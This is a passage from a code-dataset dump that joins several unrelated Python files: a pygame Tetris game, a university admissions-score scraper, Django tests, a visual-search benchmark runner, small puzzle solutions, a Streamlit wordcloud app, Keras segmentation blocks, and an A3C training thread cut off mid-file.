*= -1\n if self.mix_color == -1:\n [self.lines_color1, self.lines_color2, self.lines_color3] = [0, 0, 0]\n elif event.type == MOUSEBUTTONDOWN:\n bd = pygame.mouse.get_pressed()\n if bd[0] == 1:\n pos = pygame.mouse.get_pos()\n # 左键单击重新开始\n if self.restart_box.collidepoint(pos[0], pos[1]):\n # 判断是否破纪录\n if self.my_count > record_list[0]:\n record_list[0], record_list[1], record_list[2] = self.my_count, record_list[0], \\\n record_list[1]\n elif self.my_count > record_list[1]:\n record_list[1], record_list[2] = self.my_count, record_list[1]\n elif self.my_count > record_list[2]:\n record_list[2] = self.my_count\n # 写入文件\n f = open('./record.txt', 'w')\n f.write(str(record_list))\n f.close()\n self.__init__()\n continue\n # 左键单击显示/隐藏格子\n elif self.show_lines_box.collidepoint(pos[0], pos[1]):\n self.show_lines *= -1\n # 左键单击暂停\n elif self.pause_box.collidepoint(pos[0], pos[1]):\n self.pause *= -1\n # 左键单击打开暂停BGM\n elif self.music_box.collidepoint(pos[0], pos[1]):\n if self.stop_music == 0:\n pygame.mixer_music.pause()\n self.stop_music = 1\n else:\n pygame.mixer_music.unpause()\n self.stop_music = 0\n self.screen.blit(self.bg_picture, (0, 0))\n # 下落\n if self.pause == -1:\n self.move_down()\n # 显示\n self.show_info()\n self.draw_box()\n self.virtual_go_fast()\n # 实时改变按钮颜色\n self.change_color()\n # 判断结束\n if self.end == 0:\n self.judge_end()\n if 0 < self.end < 3:\n # 显示Game Over\n text = self.my_font.render('Game Over!', True, (255, 50, 100))\n self.screen.blit(text, (850, 450))\n text = self.my_font.render('最终得分 %d' % self.my_count, True, (255, 50, 100))\n self.screen.blit(text, (840, 550))\n self.end += 1\n if self.end != 3:\n pygame.display.update()\n\n\n# 各种块的初始坐标\nclass Trig(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass Beeline(object):\n def __init__(self):\n self.recs = [\n [892, -82, 30, 30],\n [892, -52, 30, 30],\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n ]\n\n\nclass LBeeline(object):\n def __init__(self):\n self.recs = [\n [862, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass RBeeline(object):\n def __init__(self):\n self.recs = [\n [922, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass Field(object):\n def __init__(self):\n self.recs = [\n [862, -22, 30, 30],\n [862, 8, 30, 30],\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n ]\n\n\nclass LLadder(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, -22, 30, 30],\n [922, 8, 30, 30],\n ]\n\n\nclass RLadder(object):\n def __init__(self):\n self.recs = [\n [892, -22, 30, 30],\n [892, 8, 30, 30],\n [862, 8, 30, 30],\n [922, -22, 30, 30],\n ]\n\n\nrussia = Russia()\nrussia.began()\n","repo_name":"yunyuyuan/pygame","sub_path":"俄罗斯方块/Russia.py","file_name":"Russia.py","file_ext":"py","file_size_in_byte":38160,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"31901891557","text":"import requests\nimport json\nimport pandas as pd\n\ndef bjtupost(sort=None, year=None, province=None):\n url = 'https://zsw.bjtu.edu.cn/score/query.html'\n From_data = {'sort': sort, 'type': '非定向', 'school': '校本部',\n 'year': year, 'province': province}\n Headers = {'X-Requested-With': 'XMLHttpRequest'}\n response = requests.post(url, data=From_data, headers=Headers)\n content = json.loads(response.text)\n return content['data'][3:]\n\n\nprovinces = ['北京', '天津', '河北', '山西', '内蒙古', '辽宁', '吉林',\n '黑龙江', '上海', '江苏', '浙江', '安徽', '福建', '江西',\n '山东', '河南', '湖北', '湖南', '广东', '广西', '河南',\n '重庆', '四川', '贵州', '云南', '西藏', '陕西', '甘肃',\n '青海', '宁夏', '新疆', '港澳台侨']\nyears = ['2019', '2018', '2017']\nsorts = ['理工', '文史']\n\nCollege = []\nYear = []\nProvince = []\nCategory = []\nMajor = []\nScore = []\nContributor = []\n\nif __name__ == '__main__':\n for year in years:\n for province in provinces:\n for sort in sorts:\n result = bjtupost(sort, year, province)\n for i in range(len(result)):\n College.append('北京交通大学')\n Year.append(year)\n Province.append(province)\n Category.append(result[i]['xkml'])\n Major.append(result[i]['zymc'])\n Score.append(result[i]['zdf'])\n Contributor.append('09118104谈笑')\n\nall_data = {'College': College, 'Year': Year, 'Province': Province, 'Category': Category,\n 'Major': Major, 'Score': Score, 'Contributor': Contributor}\n\nall_data_df = pd.DataFrame(all_data)\nall_data_df.to_csv('09118104谈笑-北京交通大学.csv', index=False)\n\n\n\n","repo_name":"eshoyuan/GaokaoRecommend","sub_path":"crawler/17-19录取分数爬虫/09118104北京交通大学.py","file_name":"09118104北京交通大学.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"23772299911","text":"import json\n\nimport pytest\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\nfrom django.utils.encoding import force_str\n\nfrom infotv.views import InfoTvView\n\nEXAMPLE_DECK_DATA = {\n \"decks\": {\n \"default\": [\n {\n \"duration\": 1,\n \"content\": \"# test\",\n \"type\": \"text\",\n \"id\": \"s24t7h1n0q\"\n },\n {\n \"duration\": 1,\n \"src\": \"https://placehold.it/304x220\",\n \"type\": \"image\",\n \"id\": \"s2534m3sqo\"\n },\n {\n \"duration\": 1,\n \"type\": \"nownext\",\n \"id\": \"s2533iqgbo\"\n }\n ],\n \"testdeck\": [\n {\n \"type\": \"text\",\n \"duration\": 1,\n \"id\": \"s29nhihhe8\",\n \"content\": \"slide in testdeck\"\n }\n ]\n },\n \"eep\": None\n}\n\n\ndef get_deck_post_request():\n return RequestFactory().post(\"/\", {\"action\": \"post_deck\", \"data\": json.dumps(EXAMPLE_DECK_DATA)})\n\n\n@pytest.mark.django_db\ndef test_post_deck(rf, settings):\n settings.INFOTV_POLICY_CLASS = \"infotv.policy.AnythingGoesPolicy\"\n request = get_deck_post_request()\n last_deck_id = 0\n for _x in range(3):\n response = InfoTvView.as_view()(request=request, event=\"dsfargeg\")\n assert response.status_code == 200\n deck_id = json.loads(force_str(response.content))[\"id\"]\n assert deck_id > last_deck_id\n last_deck_id = deck_id\n response = InfoTvView.as_view()(request=rf.get(\"/\", {\"action\": \"get_deck\"}), event=\"dsfargeg\")\n deck_data = json.loads(force_str(response.content))\n assert deck_data[\"id\"] == last_deck_id\n assert deck_data[\"data\"] == EXAMPLE_DECK_DATA\n\n\n@pytest.mark.django_db\ndef test_get_bogus_event_deck(rf):\n response = InfoTvView.as_view()(request=rf.get(\"/\", {\"action\": \"get_deck\"}), event=\"dkfjstwr4iunm\")\n assert json.loads(force_str(response.content))[\"id\"] == \"missing\"\n\n\n@pytest.mark.django_db\ndef test_post_deck_auth():\n request = get_deck_post_request()\n with override_settings(INFOTV_POLICY_CLASS=\"infotv.policy.BasePolicy\"):\n response = InfoTvView.as_view()(request, event=\"dsfargeg\")\n assert response.status_code == 401\n","repo_name":"kcsry/infotv","sub_path":"infotv_test/tests/test_deck.py","file_name":"test_deck.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2093224145","text":"import constants\nimport argparse\nimport utils\nimport importlib\nimport Metrics.main as run_metrics\n\n\ndef main(datasets, models, metrics, plot_results, force_execution):\n for dataset_name in datasets:\n for model_name in models:\n if force_execution: utils.delete_precomputed_results(dataset_name, model_name)\n\n if utils.found_precomputed_results(dataset_name, model_name):\n print('Found precomputed results for ' + model_name + ' on ' + dataset_name + ' dataset')\n continue\n\n print('Running ' + model_name + ' on ' + dataset_name + ' dataset')\n model = importlib.import_module(constants.MODELS_PATH + '.' + model_name + '.main')\n model.main(dataset_name)\n\n if metrics:\n cum_perf = 'perf' in metrics\n multimatch = 'mm' in metrics\n human_scanpath_prediction = 'hsp' in metrics\n\n run_metrics.main(datasets, models, cum_perf, multimatch, human_scanpath_prediction, plot_results)\n\n\nif __name__ == \"__main__\":\n available_models = utils.get_dirs(constants.MODELS_PATH)\n available_datasets = utils.get_dirs(constants.DATASETS_PATH)\n available_metrics = constants.AVAILABLE_METRICS\n parser = argparse.ArgumentParser(\n description='Run a given set of visual search models on specific datasets and compute the corresponding metrics'\n )\n parser.add_argument('--d', '--datasets', type=str, nargs='*', default=available_datasets,\n help='Names of the datasets on which to run the models. \\\n Values must be in list: ' + str(available_datasets))\n parser.add_argument('--m', '--models', type=str, nargs='*', default=available_models,\n help='Names of the models to run. \\\n Values must be in list: ' + str(available_models))\n parser.add_argument('--mts', '--metrics', type=str, nargs='*', default=available_metrics,\n help='Names of the metrics to compute. \\\n Values must be in list: ' + str(available_metrics) + '. \\\n Leave blank to not run any. WARNING: If not precomputed, human scanpath prediction (hsp) will take a LONG time!'\n )\n parser.add_argument('--noplot', action='store_true',\n help='Do not plot metrics. Useful for leaving it running and going AFK.')\n parser.add_argument('--f', '--force', action='store_true',\n help='Deletes all precomputed results and forces models\\' execution.')\n\n args = parser.parse_args()\n invalid_models = not all(model in available_models for model in args.m)\n invalid_datasets = not all(dataset in available_datasets for dataset in args.d)\n invalid_metrics = not all(metric in available_metrics for metric in args.mts)\n if (not args.m or invalid_models) or (not args.d or invalid_datasets) or invalid_metrics:\n raise ValueError('Invalid set of models, datasets or metrics')\n\n main(args.d, args.m, args.mts, not args.noplot, args.f)\n","repo_name":"FerminT/VisualSearchBenchmark","sub_path":"run_benchmark.py","file_name":"run_benchmark.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"35696085367","text":"n = int(input())\r\narr = []\r\n\r\nfor i in range(n):\r\n arr.append(input().strip())\r\nset_arr = set(arr)\r\narr = list(set_arr) # 중복 제거\r\narr.sort() # 정렬\r\narr.sort(key = len) # 길이 순 정렬\r\n\r\nfor i in arr:\r\n print(i)","repo_name":"Hitbee-dev/Coding_test","sub_path":"baekjoon/12.sort/1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14999443260","text":"\"\"\"\nEP - 25\n\nThe Fibonacci sequence is defined by the recurrence relation:\n\nFn = Fn−1 + Fn−2, where F1 = 1 and F2 = 1.\nHence the first 12 terms will be:\n\nF1 = 1\nF2 = 1\nF3 = 2\nF4 = 3\nF5 = 5\nF6 = 8\nF7 = 13\nF8 = 21\nF9 = 34\nF10 = 55\nF11 = 89\nF12 = 144\nThe 12th term, F12, is the first term to contain three digits.\n\nWhat is the index of the first term in the Fibonacci sequence to contain 1000 digits?\n\"\"\"\n\ndef fibonacci(limit):\n # This function generates the fibonacci series until\n # an element in this series contain 1000 digits.\n fib_list = [1,1]\n F1, F2 = 1, 1\n while True:\n total = F1 + F2\n fib_list.append(total)\n if len(str(total)) == limit:\n val = fib_list.index(total)+1 # python has 0 indexing!!\n break\n F2, F1 = total, F2\n return val,fib_list # return the sequence and the index\n\nif __name__ == \"__main__\":\n limit = 1000\n index, fib_seq = fibonacci(limit)\n print(\"The first term in the Fibonacci sequence to contain 1000 digits is at {} location\".format(index))\n print(\"First 20 Fibonacci Sequence {}\".format(fib_seq[:20]))\n","repo_name":"supria68/ProjectEuler","sub_path":"python/find_fibonacci.py","file_name":"find_fibonacci.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13660826630","text":"import streamlit as st\n\nimport csv\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport re\nimport zipfile\n\nimport fitz\nimport nltk\nimport pdfplumber\nimport pytesseract\n\nfrom collections import Counter\nfrom io import StringIO\nfrom nltk.corpus import stopwords\nfrom os import listdir\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom wordcloud import WordCloud\n\n# Configure page title\nst.set_page_config(page_title=\"Multi-WordCloud Generator\")\n\nnltk.download('stopwords')\n\nuploaded = {} # to hold files and file info after uploading\nINDIVIDUAL_WORD_CLOUDS = False\nCONTAINS_SCANNED_PDFS = False # Set to true if you know your data contains scanned documents, but you cannot specify which are scanned\nSCANNED_PDFS_TAGGED = False # Only set to True if you have named ALL scanned PDFs correctly i.e. file name ends with _scanned.pdf\n\n# add title\nst.title(\"Multi-WordCloud Generator\")\n# add a subtitle\nst.subheader(\"An OCR-enabled research tool for generating wordclouds from multiple files at a go.\")\n# Note on supported formats\nst.info(\"Currently supports PDFs, Word Documents, and raw text files.\", icon='ℹ️')\n# Add file uploader\nuploaded_files = st.file_uploader(\n \"Add your reference PDF files:\", accept_multiple_files=True)\n\ncombine_wordcloud = st.checkbox('Combine Wordclouds')\n\ndef create_word_cloud(text, title):\n # Removing non-alphanumeric characters in string\n re_pattern = re.compile(r'[^\\w\\s]', re.UNICODE)\n text = re_pattern.sub('', text)\n\n # Remove unnecessary words (stop words) like \"the\", \"and\", etc.\n words_to_count = text.split() # Split sentence into list of words\n stop_word_set = set(stopwords.words('english'))\n words_to_count = [word for word in words_to_count if word not in stop_word_set] # Remove stop words\n\n # Count the words using Python's Counter\n word_cloud_dict = Counter(words_to_count)\n\n wordcloud = WordCloud(\n max_font_size=40, \n background_color=\"white\"\n ).generate_from_frequencies(word_cloud_dict)\n \n fig, ax = plt.subplots()\n # ax.figure(figsize=(16, 10))\n ax.imshow(wordcloud, interpolation='bilinear')\n ax.axis(\"off\")\n ax.set_title(title)\n\n st.pyplot(fig)\n\n\ndef get_combined_cloud(uploaded_files):\n files_text = \"\"\n for uploaded_file in uploaded_files:\n # PDFs\n if uploaded_file.name.lower().endswith('.pdf'):\n with fitz.open(stream=uploaded_file.read()) as doc:\n for page in doc.pages():\n extracted_text = page.get_text()\n # If no text was found, assume page was scanned and treat as picture\n if len(extracted_text) == 0:\n pix = page.get_pixmap()\n output = \"outfile.png\"\n pix.save(output)\n files_text += (pytesseract.image_to_string('outfile.png').lower() + \" \")\n os.remove(\"./outfile.png\")\n else:\n files_text += (extracted_text + \" \")\n # WORD DOCS\n elif uploaded_file.name.lower().endswith(('.doc', '.docx')):\n docx = zipfile.ZipFile(uploaded_file)\n single_file_text = docx.read('word/document.xml').decode('utf-8')\n single_file_text = re.sub('<(.|\\n)*?>','',single_file_text).lower()\n files_text += (single_file_text + \" \")\n # PLAIN TEXT\n else:\n single_file_text = StringIO(uploaded_file.getvalue().decode(\"utf-8\")).read()\n files_text += (single_file_text + \" \")\n create_word_cloud(files_text, \"combined Word Cloud\")\n\n\ndef get_individual_clouds(uploaded_files):\n for uploaded_file in uploaded_files:\n single_file_text = \"\"\n # PDFs\n if uploaded_file.name.lower().endswith('.pdf'):\n with fitz.open(stream=uploaded_file.read()) as doc:\n for page in doc.pages():\n extracted_text = page.get_text()\n # If no text was found, assume page was scanned and treat as picture\n if len(extracted_text) == 0:\n pix = page.get_pixmap()\n output = \"outfile.png\"\n pix.save(output)\n single_file_text += (pytesseract.image_to_string('outfile.png').lower() + \" \")\n os.remove(\"./outfile.png\")\n else:\n single_file_text += (extracted_text + \" \")\n # WORD DOCS\n elif uploaded_file.name.lower().endswith(('.doc', '.docx')):\n docx = zipfile.ZipFile(uploaded_file)\n single_file_text = docx.read('word/document.xml').decode('utf-8')\n single_file_text = re.sub('<(.|\\n)*?>','',single_file_text).lower()\n # PLAIN TEXT\n else:\n single_file_text = StringIO(uploaded_file.getvalue().decode(\"utf-8\")).read()\n create_word_cloud(single_file_text, uploaded_file.name)\n\n\nif st.button('Generate'):\n if combine_wordcloud:\n get_combined_cloud(uploaded_files)\n else:\n get_individual_clouds(uploaded_files)\n","repo_name":"KayO-GH/Word-Cloud-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8265039022","text":"import csv\r\nimport re\r\nimport nltk\r\n\r\ndef arrayprinter(inparr):\r\n inpstr=\"\"\r\n for i in inparr:\r\n inpstr=inpstr+i+\"@@\"\r\n inpstr=inpstr[:len(inpstr)-2]\r\n return inpstr\r\n\r\n#test=[\"[She],[Her]\",\"[Microsoft],[Windows]\"]\r\n#print(arrayprinter(test))\r\n#quit()\r\n\r\n\r\n#fucntion to add all the numbers and stuff\r\ndef unique_worder(ori_text):\r\n split_ori=nltk.word_tokenize(ori_text)\r\n for i in range(len(split_ori)):\r\n curr_word_count=1\r\n if(re.search(\"\\[|\\]|[0-9]+|_\",split_ori[i])==None and re.search(\"[a-zA-Z]\", split_ori[i])!=None):\r\n temp_word=split_ori[i]\r\n for j in range(i,len(split_ori)):\r\n if(temp_word==split_ori[j] and i!=j):\r\n curr_word_count=curr_word_count+1\r\n split_ori[j]=\"[\" + split_ori[j]+\"]\"+str(curr_word_count)\r\n if(curr_word_count!=1 and re.search(\"\\[|\\]|[0-9]+|_\",split_ori[i])==None and re.search(\"[a-zA-Z]\", split_ori[i])!=None ):\r\n split_ori[i]=\"[\" + split_ori[i]+\"]1\"\r\n elif(curr_word_count==1):\r\n split_ori[i]=\"[\" + split_ori[i]+\"]\"\r\n outputter=\"\"\r\n for wordd in split_ori:\r\n outputter=outputter+wordd.strip() + \" \"\r\n return outputter\r\n\r\n\r\n#loading previous progress\r\npreviousindexhandle=open(\"currentindex.txt\",\"r\",encoding=\"utf8\")\r\npreviousindex=previousindexhandle.read()\r\nif(previousindex!=''):\r\n print(\"Previous progress loaded, currently at index:\",int(previousindex))\r\n previousindex=int(previousindex)+1\r\nelse:\r\n print(\"Previous progress not loaded.\")\r\n previousindex=0\r\npreviousindexhandle.close()\r\n\r\n\r\n\r\n\r\n#making an array from the input\r\nall_texts=[]\r\ngapdata=open(\"gapdev_edit.tsv\",\"r\",encoding=\"utf8\")\r\nfor row in csv.reader(gapdata, delimiter='\\t', lineterminator='\\n'):\r\n if(row[0]!='Original Text'):\r\n all_texts.append(row[0])\r\ngapdata.close()\r\n\r\n\r\n#opening the output file\r\ntsvfile= open('annotate.tsv', 'a', newline='')\r\nwriter = csv.writer(tsvfile, delimiter='\\t', lineterminator='\\n')\r\n\r\n\r\n\r\nfor current_id_index in range(previousindex,100): #replace 50 with len(all_texts) to do the rest of the texts (there are 241)\r\n full_annotation=[]\r\n annotation_state=True\r\n mod_word_list=nltk.word_tokenize(unique_worder(all_texts[current_id_index]))\r\n current_unique=unique_worder(all_texts[current_id_index])\r\n while(annotation_state):\r\n print()\r\n print()\r\n print(current_unique)\r\n print('TYPE ? to see the original text:')\r\n print('TYPE THE COREF CHAIN. Type ! to move onto the next text. (CTRL+C to exit):')\r\n anno_line = input()\r\n if(anno_line=='!'): #this is the only way you can stop annotating a line\r\n anno_line=True\r\n \r\n writer.writerow([all_texts[current_id_index],current_unique, arrayprinter(full_annotation)])\r\n #updating current progress \r\n currentindex=open(\"currentindex.txt\",\"r+\",encoding=\"utf8\")\r\n currentindex.write(str(current_id_index))\r\n currentindex.close()\r\n break\r\n elif(anno_line==\"?\"):\r\n print()\r\n print(all_texts[current_id_index])\r\n else:\r\n previous_index=-1\r\n anno_test=True\r\n if(re.search(\",\",anno_line)!=None):\r\n for annotation_word in anno_line.split(','):\r\n if(annotation_word not in unique_worder(all_texts[current_id_index])):\r\n print(\"\\033[91m REJECTED. \" + annotation_word + \"is not in the list!\\033[37m\")\r\n anno_test=False\r\n break\r\n elif(annotation_word==\" \"):\r\n print(\"\\033[91m REJECTED. A single whitesplace is not a viable option.\\033[37m\")\r\n anno_test=False\r\n break\r\n else:\r\n if(unique_worder(all_texts[current_id_index]).index(annotation_word)>previous_index):\r\n previous_index=unique_worder(all_texts[current_id_index]).index(annotation_word)\r\n else:\r\n print(\"\\033[91m REJECTED. Put your words in the right order.\\033[37m\")\r\n anno_test=False\r\n break\r\n if(anno_test==True):\r\n full_annotation.append(anno_line)\r\n else:\r\n print(\"\\033[91m REJECTED. You need to use commas to seperate the words and have at least two words in a chain.\\033[37m\")\r\ntsvfile.close()\r\n\r\n\r\n","repo_name":"cindyliang01/Nouns-Coreference-Annotation","sub_path":"Coreference Annotation/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34826604738","text":"# Three components for MesNet\n# MFP: Multi-scale Feature Pre-extraction\n# ESCP: Encoder Spatial Cascading Path\n# SE: Squeeze and Excitation block (attention)\n\nfrom keras.layers import core, Input, Conv2D, Dense, MaxPooling2D, UpSampling2D, BatchNormalization, Activation, Concatenate, Multiply, GlobalMaxPooling2D\nfrom keras.models import Model\n\ndef MFP_Block(inputs):\n branch1 = Conv2D(32, 3, padding='same')(inputs)\n branch1 = BatchNormalization()(branch1)\n branch1 = Activation(\"relu\")(branch1)\n\n branch2 = Conv2D(32, 3, dilation_rate=3, padding='same')(inputs)\n branch2 = BatchNormalization()(branch2)\n branch2 = Activation(\"relu\")(branch2)\n\n branch3 = Conv2D(32, 5, padding='same')(inputs)\n branch3 = BatchNormalization()(branch3)\n branch3 = Activation(\"relu\")(branch3)\n\n branch4 = Conv2D(32, 3, padding='same')(inputs)\n branch4 = BatchNormalization()(branch4)\n branch4 = Activation(\"relu\")(branch4)\n branch4 = Conv2D(32, 1, padding='same')(branch4)\n branch4 = BatchNormalization()(branch4)\n branch4 = Activation(\"relu\")(branch4)\n\n branch5 = Conv2D(32, 3, dilation_rate=3, padding='same')(inputs)\n branch5 = BatchNormalization()(branch5)\n branch5 = Activation(\"relu\")(branch5)\n branch5 = Conv2D(32, 3, dilation_rate=5, padding='same')(branch5)\n branch5 = BatchNormalization()(branch5)\n branch5 = Activation(\"relu\")(branch5)\n\n merge = Concatenate()([branch1, branch2, branch3, branch4, branch5])\n return merge\n\n\ndef ESCP(input1, input2, input3):\n # downsampling to the same (h*w)\n input1 = MaxPooling2D((2, 2))(input1)\n input1 = MaxPooling2D((2, 2))(input1)\n input2 = MaxPooling2D((2, 2))(input2)\n\n inputs = Concatenate()([input1, input2, input3])\n conv1 = Conv2D(128, 3, padding='same')(inputs)\n conv1 = BatchNormalization()(conv1)\n conv1 = Activation(\"relu\")(conv1)\n\n conv2 = Conv2D(64, 3, dilation_rate=3, padding='same')(conv1)\n conv2 = BatchNormalization()(conv2)\n conv2 = Activation(\"relu\")(conv2)\n\n conv3 = Conv2D(64, 3, dilation_rate=5, padding='same')(conv2)\n conv3 = BatchNormalization()(conv3)\n conv3 = Activation(\"relu\")(conv3)\n\n merge = Concatenate()([conv1, conv2, conv3])\n return merge\n\n# 返回一个概率\ndef SE_Block(feature_map):\n _, w, h, c = feature_map.get_shape()\n inputs = feature_map\n gp = GlobalMaxPooling2D()(inputs)\n dense1 = Dense(c // 16, activation='relu')(gp)\n dense2 = Dense(c, activation='sigmoid')(dense1)\n # dense2 = core.Reshape((1, 1, c))(dense2)\n return dense2\n\n\n","repo_name":"kkkuangzh/Retinal-vessel-segmentation","sub_path":"Blocks.py","file_name":"Blocks.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35594758615","text":"from agent.network import SceneSpecificNetwork, SharedNetwork, ActorCriticLoss\r\nfrom agent.environment import Environment, THORDiscreteEnvironment\r\nimport torch.nn as nn\r\nfrom typing import Dict, Collection\r\nimport signal\r\nimport random\r\nimport torch\r\nimport h5py\r\nfrom agent.replay import ReplayMemory, Sample\r\nfrom collections import namedtuple\r\nimport torch.multiprocessing as mp\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport logging\r\nfrom multiprocessing import Condition\r\n\r\nTrainingSample = namedtuple('TrainingSample', ('state', 'policy', 'value', 'action_taken', 'goal', 'R', 'temporary_difference'))\r\n\r\n\r\n\r\n\r\n\r\nclass TrainingThread(mp.Process):\r\n def __init__(self,\r\n id : int,\r\n network : torch.nn.Module,\r\n saver,\r\n optimizer,\r\n scene : str,\r\n **kwargs):\r\n\r\n super(TrainingThread, self).__init__()\r\n\r\n # Initialize the environment\r\n self.env = None\r\n self.init_args = kwargs\r\n self.scene = scene\r\n self.saver = saver\r\n self.local_backbone_network = SharedNetwork()\r\n self.id = id\r\n\r\n self.master_network = network\r\n self.optimizer = optimizer\r\n\r\n def _sync_network(self):\r\n self.policy_network.load_state_dict(self.master_network.state_dict())\r\n\r\n def _ensure_shared_grads(self):\r\n for param, shared_param in zip(self.policy_network.parameters(), self.master_network.parameters()):\r\n if shared_param.grad is not None:\r\n return \r\n shared_param._grad = param.grad \r\n \r\n def get_action_space_size(self):\r\n return len(self.env.actions)\r\n\r\n def _initialize_thread(self):\r\n h5_file_path = self.init_args.get('h5_file_path')\r\n # self.logger = logging.getLogger('agent')\r\n # self.logger.setLevel(logging.INFO)\r\n self.init_args['h5_file_path'] = lambda scene: h5_file_path.replace('{scene}', scene)\r\n self.env = THORDiscreteEnvironment(self.scene, **self.init_args)\r\n self.gamma : float = self.init_args.get('gamma', 0.99)\r\n self.grad_norm: float = self.init_args.get('grad_norm', 40.0)\r\n entropy_beta : float = self.init_args.get('entropy_beta', 0.01)\r\n self.max_t : int = self.init_args.get('max_t', 5)\r\n self.local_t = 0\r\n self.action_space_size = self.get_action_space_size()\r\n\r\n self.criterion = ActorCriticLoss(entropy_beta)\r\n self.policy_network = nn.Sequential(SharedNetwork(), SceneSpecificNetwork(self.get_action_space_size()))\r\n\r\n # Initialize the episode\r\n self._reset_episode()\r\n self._sync_network()\r\n\r\n\r\n def _reset_episode(self):\r\n self.episode_reward = 0\r\n self.episode_length = 0\r\n self.episode_max_q = -np.inf\r\n self.env.reset()\r\n\r\n def _forward_explore(self):\r\n # Does the evaluation end naturally?\r\n is_terminal = False\r\n terminal_end = False\r\n\r\n results = { \"policy\":[], \"value\": []}\r\n rollout_path = {\"state\": [], \"action\": [], \"rewards\": [], \"done\": []}\r\n\r\n # Plays out one game to end or max_t\r\n for t in range(self.max_t):\r\n state = { \r\n \"current\": self.env.render('resnet_features'),\r\n \"goal\": self.env.render_target('resnet_features'),\r\n }\r\n\r\n x_processed = torch.from_numpy(state[\"current\"])\r\n goal_processed = torch.from_numpy(state[\"goal\"])\r\n\r\n (policy, value) = self.policy_network((x_processed, goal_processed,))\r\n\r\n # Store raw network output to use in backprop\r\n results[\"policy\"].append(policy)\r\n results[\"value\"].append(value)\r\n\r\n with torch.no_grad():\r\n (_, action,) = policy.max(0)\r\n action = F.softmax(policy, dim=0).multinomial(1).item()\r\n \r\n policy = policy.data.numpy()\r\n value = value.data.numpy()\r\n \r\n \r\n # Makes the step in the environment\r\n self.env.step(action)\r\n\r\n # Receives the game reward\r\n is_terminal = self.env.is_terminal\r\n\r\n # ad-hoc reward for navigation\r\n reward = 10.0 if is_terminal else -0.01\r\n\r\n # Max episode length\r\n if self.episode_length > 5e3: is_terminal = True\r\n\r\n # Update episode stats\r\n self.episode_length += 1\r\n self.episode_reward += reward\r\n self.episode_max_q = max(self.episode_max_q, np.max(value))\r\n\r\n # clip reward\r\n reward = np.clip(reward, -1, 1)\r\n\r\n # Increase local time\r\n self.local_t += 1\r\n\r\n rollout_path[\"state\"].append(state)\r\n rollout_path[\"action\"].append(action)\r\n rollout_path[\"rewards\"].append(reward)\r\n rollout_path[\"done\"].append(is_terminal)\r\n\r\n if is_terminal:\r\n # TODO: add logging\r\n print('playout finished')\r\n print(f'episode length: {self.episode_length}')\r\n print(f'episode reward: {self.episode_reward}')\r\n print(f'episode max_q: {self.episode_max_q}')\r\n\r\n terminal_end = True\r\n self._reset_episode()\r\n break\r\n\r\n if terminal_end:\r\n return 0.0, results, rollout_path\r\n else:\r\n x_processed = torch.from_numpy(self.env.render('resnet_features'))\r\n goal_processed = torch.from_numpy(self.env.render_target('resnet_features'))\r\n\r\n (_, value) = self.policy_network((x_processed, goal_processed,))\r\n return value.data.item(), results, rollout_path\r\n \r\n def _optimize_path(self, playout_reward: float, results, rollout_path):\r\n policy_batch = []\r\n value_batch = []\r\n action_batch = []\r\n temporary_difference_batch = []\r\n playout_reward_batch = []\r\n\r\n\r\n for i in reversed(range(len(results[\"value\"]))):\r\n reward = rollout_path[\"rewards\"][i]\r\n value = results[\"value\"][i]\r\n action = rollout_path[\"action\"][i]\r\n\r\n playout_reward = reward + self.gamma * playout_reward\r\n temporary_difference = playout_reward - value.data.item()\r\n\r\n policy_batch.append(results['policy'][i])\r\n value_batch.append(results['value'][i])\r\n action_batch.append(action)\r\n temporary_difference_batch.append(temporary_difference)\r\n playout_reward_batch.append(playout_reward)\r\n \r\n policy_batch = torch.stack(policy_batch, 0)\r\n value_batch = torch.stack(value_batch, 0)\r\n action_batch = torch.from_numpy(np.array(action_batch, dtype=np.int64))\r\n temporary_difference_batch = torch.from_numpy(np.array(temporary_difference_batch, dtype=np.float32))\r\n playout_reward_batch = torch.from_numpy(np.array(playout_reward_batch, dtype=np.float32))\r\n \r\n # Compute loss\r\n loss = self.criterion.forward(policy_batch, value_batch, action_batch, temporary_difference_batch, playout_reward_batch)\r\n loss = loss.sum()\r\n\r\n loss_value = loss.detach().numpy()\r\n self.optimizer.optimize(loss, \r\n self.policy_network.parameters(), \r\n self.master_network.parameters())\r\n\r\n def run(self, master = None):\r\n signal.signal(signal.SIGINT, signal.SIG_IGN)\r\n print(f'Thread 